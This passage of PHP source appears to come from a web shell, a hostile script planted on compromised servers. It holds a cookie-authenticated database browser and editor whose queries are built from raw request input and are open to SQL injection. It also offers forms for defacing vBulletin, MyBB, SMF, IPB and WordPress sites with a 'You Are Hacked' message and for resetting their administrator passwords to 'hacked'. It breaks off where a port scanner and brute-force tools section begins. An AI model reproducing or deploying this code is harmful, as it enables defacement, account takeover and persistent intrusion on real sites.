2723                                         $dbuser = $_COOKIE["dbuser"];
2724                                         $dbpass = $_COOKIE["dbpass"];
2725                                         $dbname = $_GET['dbname'];
2726                                         $tablename = $_GET['tablename'];
2727                                         echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2728 ?>
2729            <br><br>
2730            <form>
2731            <input type="hidden" value="<?php echo $_GET['dbname']; ?>" name="dbname">
2732            <input type="hidden" value="<?php echo $_GET['tablename']; ?>" name="tablename">
2733            <input type="hidden" value="executequery" name="action">
2734            <table>
2735                <tr>
2736                    <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
2737                </tr>
2738                <tr>
2739                    <td><input type="submit" value="Execute" class="but"></td>
2740                </tr>
2741            </table>
2742            </form>
2743            <?php
2744                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2745                                         mysql_select_db($dbname);
2746                                         $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname')  AND (`TABLE_NAME` = '$tablename')  AND (`COLUMN_KEY` = 'PRI');");
2747                                         $row = mysql_fetch_array($sql);
2748                                         $rowid = $row['COLUMN_NAME'];
2749                                         echo "<br><font size=4 color =lime>Data in Table</font><br>";
2750                                         if ($tablename != "") echo "<font size=3 color=lime>$dbname > $tablename</font><br>";
2751                                         else echo "<font size=3 color=lime>$dbname</font><br>";
2752                                         $queryStr = "";
2753                                         $pag = 0;
2754                                         $queryStr = stripslashes($queryStr);
2755                                         if ($queryStr == "") {
2756                                             if (isset($_REQUEST['page'])) {
2757                                                 $res = mysql_query("select * from $tablename");
2758                                                 $getres = mysql_num_rows($res);
2759                                                 $coun = ceil($getres / 30);
2760                                                 if ($_REQUEST['page'] != 1) $pag = $_REQUEST['page'] * 30;
2761                                                 else $pag = $_REQUEST['page'] * 30;
2762                                                 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
2763                                                 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
2764                                                 $arrcount = 1;
2765                                                 $arrdata[$arrcount] = 0;
2766                                                 while ($row = mysql_fetch_array($sql)) {
2767                                                     $arrdata[$arrcount] = $row[$rowid];
2768                                                     $arrcount++;
2769                                                 }
2770                                             } else {
2771                                                 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
2772                                                 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
2773                                                 $arrcount = 1;
2774                                                 $arrdata[$arrcount] = 0;
2775                                                 while ($row = mysql_fetch_array($sql)) {
2776                                                     $arrdata[$arrcount] = $row[$rowid];
2777                                                     $arrcount++;
2778                                                 }
2779                                             }
2780                                             if ($orderby != "") $queryStr.= " ORDER BY $orderby";
2781                                             echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'><font size=3>Schema</font></a>
2782 ";
2783                                         }
2784                                         $pResult = mysql_query($queryStr);
2785                                         $fieldt = mysql_fetch_field($pResult);
2786                                         $tablename = $fieldt->table;
2787                                         $errMsg = mysql_error();
2788                                         $GLOBALS[queryStr] = $queryStr;
2789                                         if ($pResult == false) {
2790                                             echoQueryResult();
2791                                             return;
2792                                         }
2793                                         if ($pResult == 1) {
2794                                             $errMsg = "Success";
2795                                             echoQueryResult();
2796                                             return;
2797                                         }
2798                                         echo "<hr>
2799 ";
2800                                         $row = mysql_num_rows($pResult);
2801                                         $col = mysql_num_fields($pResult);
2802                                         if ($row == 0) {
2803                                             echo "<font color=red size=3>No Data Exist!</font>";
2804                                             return;
2805                                         }
2806                                         if ($rowperpage == "") $rowperpage = 30;
2807                                         if ($page == "") $page = 0;
2808                                         else $page--;
2809                                         mysql_data_seek($pResult, $page * $rowperpage);
2810                                         echo "<table cellspacing=1 cellpadding=5 border=1 align=center>
2811 ";
2812                                         echo "<tr>
2813 ";
2814                                         for ($i = 0;$i < $col;$i++) {
2815                                             $field = mysql_fetch_field($pResult, $i);
2816                                             echo "<th>";
2817                                             if ($action == "viewdata") echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=" . $field->name . "'>" . $field->name . "</a>
2818 ";
2819                                             else echo $field->name . "
2820 ";
2821                                             echo "</th>
2822 ";
2823                                         }
2824                                         echo "<th colspan=2>Action</th>
2825 ";
2826                                         echo "</tr>
2827 ";
2828                                         $num = 1;
2829                                         $acount = 1;
2830                                         for ($i = 0;$i < $rowperpage;$i++) {
2831                                             $rowArray = mysql_fetch_row($pResult);
2832                                             if ($rowArray == false) break;
2833                                             echo "<tr>
2834 ";
2835                                             $key = "";
2836                                             for ($j = 0;$j < $col;$j++) {
2837                                                 $data = $rowArray[$j];
2838                                                 $field = mysql_fetch_field($pResult, $j);
2839                                                 if ($field->primary_key == 1) $key.= "&" . $field->name . "=" . $data;
2840                                                 if (strlen($data) > 30) $data = substr($data, 0, 30) . "...";
2841                                                 $data = htmlspecialchars($data);
2842                                                 echo "<td>
2843 ";
2844                                                 echo "<font color=lime>$data</font>
2845 ";
2846                                                 echo "</td>
2847 ";
2848                                             }
2849                                             if (!is_numeric($arrdata[$acount])) echo "<td colspan=2>No Key</td>
2850 ";
2851                                             else {
2852                                                 echo "<td><a href='$PHP_SELF?action=editData&$rowid=$arrdata[$acount]&dbname=$dbname&tablename=$tablename'>Edit</a></td>
2853 ";
2854                                                 echo "<td><a href='$PHP_SELF?action=deleteData&$rowid=$arrdata[$acount]&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>
2855 ";
2856                                                 $acount++;
2857                                             }
2858                                         }
2859                                         echo "</tr>
2860 ";
2861                                         echo "</table>";
2862                                         if ($arrcount > 30) {
2863                                             $res = mysql_query("select * from $tablename");
2864                                             $getres = mysql_num_rows($res);
2865                                             $coun = ceil($getres / 30);
2866                                             echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
2867                                             for ($i = 0;$i < $coun;$i++) echo "<option value=$i>$i</option>";
2868                                             echo "</select> <input type=submit value=Go class=but></form>";
2869                                             echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2870                                         }
2871                                     }
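2872                                     // Delete Table Data: connects with the DB credentials stored in the dbserver/dbuser/dbpass cookies and deletes the row whose primary-key value arrives in the query string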
2873                                     if ($_GET['action'] == "deleteData") {
2874                                         $dbserver = $_COOKIE["dbserver"];
2875                                         $dbuser = $_COOKIE["dbuser"];
2876                                         $dbpass = $_COOKIE["dbpass"];
2877                                         $dbname = $_GET['dbname'];
2878                                         $tablename = $_GET['tablename'];
2879                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2880                                         mysql_select_db($dbname);
2881                                         $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname')  AND (`TABLE_NAME` = '$tablename')  AND (`COLUMN_KEY` = 'PRI');");
2882                                         $row = mysql_fetch_array($sql);
2883                                         $row = $row['COLUMN_NAME'];
2884                                         $rowid = $_GET[$row];
2885                                         mysql_query("delete from $tablename where $row = '$rowid'");
2886                                         header("Location:$self?action=viewdata&dbname=$dbname&tablename=$tablename");
2887                                     }
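2888                                     // Edit Table Data: renders an HTML form pre-filled with the selected row (one input per column) that posts back with action=editsubmitData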
2889                                     if ($_GET['action'] == "editData") {
2890                                         global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
2891                                         $dbserver = $_COOKIE["dbserver"];
2892                                         $dbuser = $_COOKIE["dbuser"];
2893                                         $dbpass = $_COOKIE["dbpass"];
2894                                         $dbname = $_GET['dbname'];
2895                                         $tablename = $_GET['tablename'];
2896                                         echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2897 ?>
2898            <br><br>
2899            <form action="<?php echo $self; ?>" method="post">
2900            <input type="hidden" name="tablename" value="<?php echo $tablename; ?>">
2901            <input type="hidden" name="action" value="editsubmitData">
2902            <?php
2903                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2904                                         mysql_select_db($dbname);
2905                                         $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname')  AND (`TABLE_NAME` = '$tablename')  AND (`COLUMN_KEY` = 'PRI');");
2906                                         $row = mysql_fetch_array($sql);
2907                                         $row = $row['COLUMN_NAME'];
2908                                         $rowid = $_GET[$row];
2909                                         $pResult = mysql_list_fields($dbname, $tablename);
2910                                         $num = mysql_num_fields($pResult);
2911                                         $key = "";
2912                                         for ($i = 0;$i < $num;$i++) {
2913                                             $field = mysql_fetch_field($pResult, $i);
2914                                             if ($field->primary_key == 1) if ($field->numeric == 1) $key.= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
2915                                             else $key.= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
2916                                         }
2917                                         $key = substr($key, 0, strlen($key) - 4);
2918                                         mysql_select_db($dbname, $mysqlHandle);
2919                                         $pResult = mysql_query($queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle);
2920                                         $data = mysql_fetch_array($pResult);
2921                                         echo "<input type=hidden name=dbname value=$dbname>
2922 ";
2923                                         echo "<input type=hidden name=tablename value=$tablename>
2924 ";
2925                                         echo "<input type=hidden name=$row value=$rowid>";
2926                                         echo "<table cellspacing=1 cellpadding=2 border=1>
2927 ";
2928                                         echo "<tr>
2929 ";
2930                                         echo "<th>Name</th>
2931 ";
2932                                         echo "<th>Type</th>
2933 ";
2934                                         echo "<th>Function</th>
2935 ";
2936                                         echo "<th>Data</th>
2937 ";
2938                                         echo "</tr>
2939 ";
2940                                         $pResult = mysql_db_query($dbname, "SHOW fields FROM $tablename");
2941                                         $num = mysql_num_rows($pResult);
2942                                         $pResultLen = mysql_list_fields($dbname, $tablename);
2943                                         for ($i = 0;$i < $num;$i++) {
2944                                             $field = mysql_fetch_array($pResult);
2945                                             $fieldname = $field["Field"];
2946                                             $fieldtype = $field["Type"];
2947                                             $len = mysql_field_len($pResultLen, $i);
2948                                             echo "<tr>";
2949                                             echo "<td>$fieldname</td>";
2950                                             echo "<td>" . $field["Type"] . "</td>";
2951                                             echo "<td>
2952 ";
2953                                             echo "<select name=${fieldname}_function class=sbox>
2954 ";
2955                                             echo "<option>
2956 ";
2957                                             echo "<option>ASCII
2958 ";
2959                                             echo "<option>CHAR
2960 ";
2961                                             echo "<option>SOUNDEX
2962 ";
2963                                             echo "<option>CURDATE
2964 ";
2965                                             echo "<option>CURTIME
2966 ";
2967                                             echo "<option>FROM_DAYS
2968 ";
2969                                             echo "<option>FROM_UNIXTIME
2970 ";
2971                                             echo "<option>NOW
2972 ";
2973                                             echo "<option>PASSWORD
2974 ";
2975                                             echo "<option>PERIOD_ADD
2976 ";
2977                                             echo "<option>PERIOD_DIFF
2978 ";
2979                                             echo "<option>TO_DAYS
2980 ";
2981                                             echo "<option>USER
2982 ";
2983                                             echo "<option>WEEKDAY
2984 ";
2985                                             echo "<option>RAND
2986 ";
2987                                             echo "</select>
2988 ";
2989                                             echo "</td>
2990 ";
2991                                             $value = htmlspecialchars($data[$i]);
2992                                             $type = strtok($fieldtype, " (,)
2993 ");
2994                                             if ($type == "enum" || $type == "set") {
2995                                                 echo "<td>
2996 ";
2997                                                 if ($type == "enum") echo "<select name=$fieldname class=box>
2998 ";
2999                                                 else if ($type == "set") echo "<select name=$fieldname size=4 class=box multiple>
3000 ";
3001                                                 while ($str = strtok("'")) {
3002                                                     if ($value == $str) echo "<option selected>$str
3003 ";
3004                                                     else echo "<option>$str
3005 ";
3006                                                     strtok("'");
3007                                                 }
3008                                                 echo "</select>
3009 ";
3010                                                 echo "</td>
3011 ";
3012                                             } else {
3013                                                 if ($len < 40) echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\" class=box></td>
3014 ";
3015                                                 else echo "<td><textarea cols=47 rows=3 maxlength=$len name=$fieldname class=box>$value</textarea>
3016 ";
3017                                             }
3018                                             echo "</tr>";
3019                                         }
3020                                         echo "</table><p>
3021 ";
3022                                         echo "<input type=submit value='Edit Data' class=but>
3023 ";
3024                                         echo "<input type=button value='Cancel' onClick='history.back()' class=but>
3025 ";
3026                                         echo "</form>
3027 ";
3028                                     }
3029                                 }
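3030                                 // Edit Submit Table Data: builds a single UPDATE from the request parameters named after the table's columns and runs it on the row identified by the primary key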
3031                                 else if ($_REQUEST['action'] == "editsubmitData") {
3032                                     $dbserver = $_COOKIE["dbserver"];
3033                                     $dbuser = $_COOKIE["dbuser"];
3034                                     $dbpass = $_COOKIE["dbpass"];
3035                                     $dbname = $_POST['dbname'];
3036                                     $tablename = $_POST['tablename'];
3037                                     $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
3038                                     mysql_select_db($dbname);
3039                                     $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname')  AND (`TABLE_NAME` = '$tablename')  AND (`COLUMN_KEY` = 'PRI');");
3040                                     $row = mysql_fetch_array($sql);
3041                                     $row = $row['COLUMN_NAME'];
3042                                     $rowid = $_POST[$row];
3043                                     $pResult = mysql_db_query($dbname, "SHOW fields FROM $tablename");
3044                                     $num = mysql_num_rows($pResult);
3045                                     $rowcount = $num;
3046                                     $pResultLen = mysql_list_fields($dbname, $tablename);
3047                                     for ($i = 0;$i < $num;$i++) {
3048                                         $field = mysql_fetch_array($pResult);
3049                                         $fieldname = $field["Field"];
3050                                         $arrdata = $_REQUEST[$fieldname];
3051                                         $str.= " " . $fieldname . " = '" . $arrdata . "'";
3052                                         $rowcount--;
3053                                         if ($rowcount != 0) $str.= ",";
3054                                     }
3055                                     $str = "update $tablename set" . $str . " where $row=$rowid";
3056                                     mysql_query($str);
3057                                     header("Location:$self?action=viewdata&dbname=$dbname&tablename=$tablename");
3058                                 } else if (isset($_GET['logoutdb'])) {
3059                                     setcookie("dbserver", time() - 60 * 60);
3060                                     setcookie("dbuser", time() - 60 * 60);
3061                                     setcookie("dbpass", time() - 60 * 60);
3062                                     header("Location:$self?database");
3063                                 }
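3064                                 // Forum Manager: menu plus HTML forms ("Index Changer" and "Password Changer") for several forum/CMS products; every form posts DB host, name, user and password (f1-f4) back to this script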
3065                                 else if (isset($_GET["forum"])) { ?>
3066       <center><table><tr><td><a href="<?php echo $self; ?>?forum&defaceforum"><font color="lime" size="4">| Forum Defacer |</font></a></td>
3067        <td><a href="<?php echo $self; ?>?forum&passwordchange"><font color="lime" size="4">| Forum Password Changer |</font></a></td>
3068        </tr></table></center><br>
3069        <?php
3070                                     if (isset($_GET["defaceforum"])) {
3071 ?>
3072        <center>
3073            <font color="#FF0000" size="4">Vbulletin Forum Index Changer</font>
3074            <form action="<?php echo $self; ?>" method = "POST">
3075            <table border = "1" width="50%" height="316" style="text-align: center" align="center"> 
3076                <tr>
3077                    <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3078                <p>
3079                    Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
3080                </p>
3081                </tr>
3082                <tr>
3083                    <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack VB" name="forumdeface"></td>
3084                </tr>
3085            </table>
3086            </form>
3087            
3088            <font color="#FF0000" size="4">MyBB Forum Index Changer</font>
3089            <form action="<?php echo $self; ?>" method = "POST">
3090            <table border = "1" width="50%" height="316" style="text-align: center" align="center"> 
3091                <tr>
3092                    <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3093                    <p>
3094                        Table Prefix : <input type="text" name="prefix" value="mybb_" class="sbox"> (Optional)</td>
3095                    </p>  
3096                    </td>
3097                </tr>
3098                <tr>
3099                    <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack MyBB" name="forumdeface"></td>
3100                </tr>
3101            </table>
3102            </form>
3103            
3104            <font color="#FF0000" size="4">SMF Forum Index Changer</font>
3105            <form action="<?php echo $self; ?>" method = "POST">
3106            <table border = "1" width="50%" height="316" style="text-align: center" align="center"> 
3107                <tr>
3108                    <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3109                    <p>
3110                        Table Prefix : <input type="text" name="prefix" value="smf_" class="sbox"> (Optional)</td>
3111                    </p>
3112                    </td>
3113                </tr>
3114                <tr>
3115                    <td height="105" width="780"><p align="center"><b>Message&nbsp;:</b> <input class="box" type="text" name="index" size="20" value="lol ! You Are Hacked !!!!"></p><b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">&nbsp;<input type = "submit" class="but" value = "Hack SMF" name="forumdeface"></p></td>
3116                    
3117                </tr>
3118            </table>
3119            </form>
3120            
3121            <font color="#FF0000" size="4">IPB Forum Index Changer</font>
3122            <form action="<?php echo $self; ?>" method = "POST">
3123            <table border = "1" width="50%" height="316" style="text-align: center" align="center"> 
3124                <tr>
3125                    <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20"></td>
3126                </tr>
3127                <tr>
3128                    <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack IPB" name="forumdeface"></td>
3129                </tr>
3130            </table>
3131            </form>       
3132            
3133            <font color="#FF0000" size="4">Wordpress Index Changer</font>
3134            <form action="<?php echo $self; ?>" method = "POST">
3135            <table border = "1" width="50%" height="316" style="text-align: center" align="center"> 
3136                <tr>
3137                    <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3138                    <p>
3139                        Table Prefix : <input type="text" name="prefix" value="wp_" class="sbox"> (Optional)</td>
3140                    </p>
3141                    </td>
3142                </tr>
3143                <tr>
3144                    <td height="105" width="780"><p align="center"><b>Message&nbsp;:</b> <input class="box" type="text" name="index" size="20" value="lol ! You Are Hacked !!!!"></p><b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">&nbsp;<input type = "submit" class="but" value = "Hack wordpress" name="forumdeface"></p></td>
3145                    
3146                </tr>
3147            </table>
3148            </form>
3149        </center> 
3150    <?php
3151                                     } else if (isset($_GET["passwordchange"])) {
3152                                         echo "<center>";
3153                                         if (isset($_GET['changed'])) { ?><font color="lime" size="3"><blink>Password Changed Successfully</blink></font><br><br><?php
3154                                         } else if (isset($_GET['cannotchange'])) { ?><font color="#FF0000" size="3"><blink>Cannot Change Password</blink></font><br><br> <?php
3155                                         } ?>
3156            
3157            <font color="#FF0000" size="4">Vbulletin Forum Password Changer</font>
3158            <form action="<?php echo $self; ?>" method = "POST">
3159            <input type="hidden"  name="forums" value="vb">
3160            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3161                <tr>
3162                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3163                <p>
3164                    Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
3165                </p>
3166                </tr>
3167                <tr>
3168                    <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3169                </tr>
3170            </table>
3171            </form>
3172            
3173            <font color="#FF0000" size="4">MyBB Forum Password Changer</font>
3174            <form action="<?php echo $self; ?>" method = "POST" name="mybb">
3175            <input type="hidden"  name="forums" value="mybb">
3176            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3177                <tr>
3178                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3179                <p>
3180                    Table Prefix : <input type="text" name="prefix" value="mybb_" class="sbox"> (Optional)</td>
3181                </p>
3182                </tr>
3183                <tr>
3184                    <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3185                </tr>
3186            </table>
3187            </form>
3188            
3189            <font color="#FF0000" size="4">SMF Forum Password Changer</font>
3190            <form action="<?php echo $self; ?>" method = "POST" name="smf">
3191            <input type="hidden"  name="forums" value="smf">
3192            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3193                <tr>
3194                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3195                <p>
3196                    Table Prefix : <input type="text" name="prefix" value="smf_" class="sbox"> (Optional)</td>
3197                </p>
3198                </tr>
3199                <tr>
3200                    <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3201                </tr>
3202            </table>
3203            </form>
3204            
3205            <font color="#FF0000" size="4">Phpbb Forum Password Changer</font>
3206            <form action="<?php echo $self; ?>" method = "POST">
3207            <input type="hidden"  name="forums" value="phpbb">
3208            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3209                <tr>
3210                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3211                <p>
3212                    Table Prefix : <input type="text" name="prefix" value="phpbb_" class="sbox"> (Optional)</td>
3213                </p>
3214                </tr>
3215                <tr>
3216                    <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3217                </tr>
3218            </table>
3219            </form>
3220            
3221            <font color="#FF0000" size="4">IPB Forum Password Changer</font>
3222            <form action="<?php echo $self; ?>" method = "POST" name="ipb">
3223            <input type="hidden"  name="forums" value="ipb">
3224            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3225                <tr>
3226                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3227                <p>
3228                    Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
3229                </p>
3230                </tr>
3231                <tr>
3232                    <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3233                </tr>
3234            </table>
3235            </form>       
3236            
3237            <a name="wordp" id="wordp">
3238            <font color="#FF0000" size="4">Wordpress Password Changer</font>
3239            <form action="<?php echo $self; ?>" method = "POST" name="wp">
3240            <input type="hidden"  name="forums" value="wp">
3241            <a name="wordp" id="wordp">
3242            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3243                <tr>
3244                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3245                <p>
3246                    Table Prefix : <input type="text" name="prefix" value="wp_" class="sbox"> (Optional)</td>
3247                </p>
3248                </tr>
3249                <tr>
3250                    <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1"></p><p><b>New Username :</b> <input class="sbox" type="text" name="uname" size="20" value="admin">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3251                </tr>
3252            </table>
3253            </form>
3254            
3255            <div name="jooml" id="jooml">
3256            <font color="#FF0000" size="4">Joomla Password Changer</font>
3257            <form action="<?php echo $self; ?>" method = "POST">
3258            <input type="hidden"  name="forums" value="joomla">
3259            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3260                <tr>
3261                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3262                <p>
3263                    Table Prefix : <input type="text" name="prefix" value="jos_" class="sbox"> (Optional)</td>
3264                </p>
3265                </tr>
3266                <tr>
3267                    <td height="70" width="780"><p align="center"><b>New Username :</b> <input class="sbox" type="text" name="uname" size="20" value="admin">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3268                </tr>
3269            </table>
3270            </form>
3271            <?php
3272                                         if (isset($_GET['changed'])) { ?><font color="lime" size="3"><blink>Password Changed Successfully</blink></font><br><br><?php
3273                                         } else if (isset($_GET['cannotchange'])) { ?><font color="#FF0000" size="3"><blink>Cannot Change Password</blink></font><br><br> <?php
3274                                         } ?>
3275        </center> 
3276            <?php
3277                                     }
3278                                 }
3279                                 // Tools: port scanner and brute force
3280                                 else if (isset($_GET['tools'])) {
3281 ?>
3282        <center>
3283        <table cellpadding="5" border="2" style="width:50%;">
3284            <tr>
3285                <td colspan="2" align="center"><b><font size='4' color="#FF0000">Port Scanner<br></font></b></td>
